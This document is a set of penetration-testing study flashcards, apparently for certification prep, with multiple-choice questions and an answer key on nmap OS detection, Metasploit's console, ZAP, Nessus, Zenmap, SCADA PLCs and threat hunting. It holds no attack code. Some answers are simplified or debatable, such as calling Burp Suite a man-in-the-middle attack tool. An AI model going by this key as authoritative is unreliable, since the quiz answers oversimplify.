Vulnerability and Penetration Testing Flashcards
Which nmap command line parameter attempts to identify the operating system?
A. T
B. A
C. sU
D. O
D. O
The -O parameter in nmap is used to attempt OS detection. This option tries to identify the operating system of the target host by analyzing various characteristics of the response from the target, such as TCP/IP stack behavior and other network-level details.
Why the other options are incorrect:
A. T: This parameter is used to control the timing of the scan (e.g., -T4 for faster scans). It does not relate to OS detection.
B. A: The -A parameter enables several advanced features, such as OS detection, version detection, script scanning, and traceroute. While -A includes OS detection, -O is the specific option solely for operating system detection.
C. sU: This is used for a UDP scan (-sU), not for OS detection.
Which command allows you to interact with the Metasploit framework?
A. msfadmin
B. msfconsole
C. exploit
D. use
B. msfconsole
msfconsole is the command-line interface (CLI) used to interact with the Metasploit Framework. It provides an environment where you can configure and run exploits, payloads, auxiliary modules, and more, making it the primary tool for penetration testing with Metasploit.
Which term is commonly used to describe the penetration testing?
A. Scheduled testing
B. Active testing
C. Recurring testing
D. Passive testing
B. Active testing
Active testing in the context of penetration testing refers to the process where the tester actively engages with the target system by attempting to exploit vulnerabilities, run exploits, and simulate real-world attack scenarios. This type of testing typically involves interacting with the system to identify weaknesses that could be exploited by malicious actors.
Which term describes a collection of related Microsoft Azure policies?
A. Initiative
B. Resource Group
C. Policy group
D. Subscription
A. Initiative
In Microsoft Azure, an Initiative is a collection of related policies that are grouped together for easier management and enforcement. Initiatives allow you to assign multiple policies to a scope (such as a subscription or resource group) in a single operation, ensuring that a set of related rules is applied consistently.
Which data must be supplied when using the OWASP ZAP tool?
A. The web application URL
B. The web application PKI certificate public key
C. The web server type
D. The web application PKI certificate private key
A. The web application URL
When using the OWASP ZAP (Zed Attack Proxy) tool, the primary data that must be supplied is the web application URL. This URL is needed to direct ZAP to the target web application so it can perform automated security testing, such as scanning for vulnerabilities or mapping the application.
How do vulnerability scanning tools differ from network scanning tools?
A. Network scanners use a vulnerabilities database
B. Vulnerability scanners use a vulnerabilities database
C. Vulnerability scanners cannot enumerate host ports
D. Network scanners cannot enumerate host ports
B. Vulnerability scanners use a vulnerabilities database
Vulnerability scanners are specifically designed to assess the security of systems by identifying known vulnerabilities. They rely on a vulnerabilities database to check systems against known weaknesses or misconfigurations, and they provide detailed information about the risks that can be exploited by attackers.
Network scanners, on the other hand, are typically used to discover devices and services on a network, such as through port scanning or service identification. While network scanners may identify open ports and services, they do not necessarily assess vulnerabilities in those services.
You have installed Nessus and would like to login to configure a scan. Which should you connect to?
A. http://localhost:80
B. http://localhost:8834
C. http://localhost?443
D. http://localhost:443
http://localhost:8834
Explanation: When you install Nessus, the web interface for configuring and managing scans is accessible through a browser at port 8834 by default.
In which file format does Zenmap save scans?
A. CSV
B. PDF
C. XML
D. TXT
C. XML
Zenmap, the graphical user interface (GUI) for nmap, saves scan results in XML format by default. This format allows for structured storage of scan data, which can be easily parsed and reused. XML files can be opened and reviewed in Zenmap or other compatible tools for further analysis.
You need to run a vulnerability assessment against hosts that mimic an infected host. Which type of scan should you run?
A. Scheduled
B. Web application
C. Non-credentialed
D. Credentialed
D. Credentialed
A credentialed scan is a type of vulnerability scan where the scanning tool is provided with login credentials to access the target system or network. This allows the tool to scan for vulnerabilities with higher privileges, as it mimics an internal user (or an infected host) that might have access to more system details and security weaknesses that are otherwise not visible during non-credentialed scans.
Which type of SCADA component executes instructions on industrial devices?
A. DCS
B. PLC
C. CAN
D. ICS
B. PLC
A PLC (Programmable Logic Controller) is a type of industrial control system (ICS) component that executes instructions on industrial devices. It is used to control machinery or processes in industrial environments, such as manufacturing, automation, and power plants. The PLC runs control logic, processes data, and interfaces with sensors and actuators to control physical devices.
Which threat hunting model takes a proactive approach?
A. Intel-based
B. Hypothesis-based
C. Custom
D. Agile
B. Hypothesis-based
The hypothesis-based threat hunting model takes a proactive approach to threat detection. In this model, threat hunters develop hypotheses based on potential threats or adversary behaviors, then test those hypotheses by looking for evidence in the organization’s data. This proactive method allows hunters to focus on specific attack scenarios and search for indicators of compromise (IOCs) or tactics, techniques, and procedures (TTPs) used by attackers.
Which type of attack is in effect when malicious actors use the Burpsuite?
A. Man-in-the-middle
B. Distributed denial of service
C. Denial of service
D. Brute force
A. Man-in-the-middle
Burp Suite is a popular web vulnerability scanner and proxy tool used by security professionals for penetration testing. When used in an attack scenario, Burp Suite typically operates as a man-in-the-middle (MITM) attack tool. In this type of attack, Burp Suite intercepts and modifies traffic between the client (e.g., a web browser) and the server. This allows the attacker to inspect, alter, or inject malicious content into the data being transmitted, potentially exploiting vulnerabilities in web applications.
